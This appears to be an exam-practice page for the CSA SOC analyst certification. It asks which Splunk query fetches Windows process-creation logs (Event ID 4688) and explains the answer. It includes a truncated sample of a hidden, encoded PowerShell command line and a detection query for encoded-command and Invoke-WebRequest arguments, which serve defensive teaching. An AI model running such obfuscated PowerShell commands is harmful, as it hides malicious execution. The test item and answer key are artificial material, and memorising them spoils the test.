Home ExamRange Practice Tests

CSA (312-39) SOC Simulation Lab

Master SIEM query syntax and Windows Event Log hunting. In this simulation, you will step into the role of a SOC Analyst building detection logic for malicious execution on Windows endpoints.

Scenario Context

GlobalRetail Corp's SOC has received CISA threat intelligence regarding a new ransomware variant. The threat actors are utilizing "Living off the Land" (LotL) techniques—specifically spawning encoded PowerShell commands from legitimate system processes like explorer.exe or cmd.exe.

As the Senior Threat Hunter, you are mentoring John, a junior analyst. You task him with building a baseline Splunk dashboard to monitor all process creation events across the Windows endpoint fleet, filtering out noisy background system noise.

Security Environment

You review a sample log of the exact activity you want the Splunk query to catch:

[Splunk Enterprise] Raw Log Preview - Suspicious Activity ======================================================== Time: 2026-04-08T15:05:22Z LogName: Security EventCode: ???? TaskCategory: Process Creation Account_Name: jdoe Account_Domain: GLOBALRETAIL Process_Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Creator_Process_Name: C:\Windows\explorer.exe CommandLine: powershell.exe -nop -w hidden -enc JABzAD0ATgBl... [Analyst Note]: We need to search for the specific EventCode that logs "A new process has been created". To reduce noise, John wants to exclude machine accounts (which usually end with a '$'). ======================================================== Required Action: Select the correct Splunk query string.

Question

John, SOC analyst wants to monitor the attempt of process creation activities from any of their Windows endpoints. Which of following Splunk query will help him to fetch related logs associated with process creation?
SOC Hint: Windows Security Event IDs are crucial for SOC analysts to memorize. 4624 is successful logon. 4625 is failed logon. Which standard 46xx event ID is recorded when the OS creates a new process (executable)?

Expert Insight

What is happening?

The SOC is hunting for Execution (MITRE ATT&CK TA0002). To see what programs are running on endpoints, the SIEM must query Windows Security logs for process creation events. Additionally, because Windows domains generate massive amounts of background noise from computer accounts authenticating and running background tasks, the analyst is appending NOT (Account_Name=*$) to filter out any account ending in a dollar sign (the standard format for AD machine accounts, e.g., WORKSTATION1$).

Why B is correct

EventCode=4688 is the standard Windows Security log ID for "A new process has been created." It is one of the most critical event IDs monitored in any SOC. Combined with the filter to remove machine accounts, this query provides a clean feed of user-initiated processes across the environment.

Why the other options are wrong

A (4678): This is not a common or relevant event ID for process creation. (Note: 4670 is object permissions, 4672 is special privileges assigned).

C & D (3688 / 5688): These event IDs do not exist in the standard, modern Windows Security auditing schema for process execution.

MINI LESSON: Command Line Auditing (Event ID 4688)

By default, Event ID 4688 only tells you that a process started (e.g., powershell.exe). It does not tell you what that process did. In a mature SOC environment, you must enable a specific Group Policy Object (GPO) called "Include command line in process creation events."

Once enabled, the CommandLine field is added to the 4688 log. Without this, you only know PowerShell ran. With it, you can write Splunk queries to detect malicious arguments:

index=windows EventCode=4688 CommandLine IN ("*-enc*", "*-EncodedCommand*", "*Invoke-WebRequest*")

This transforms Event ID 4688 from a basic visibility tool into a high-fidelity threat hunting weapon.

Ready to validate more SOC engineering and operational concepts?

Explore more CSA simulations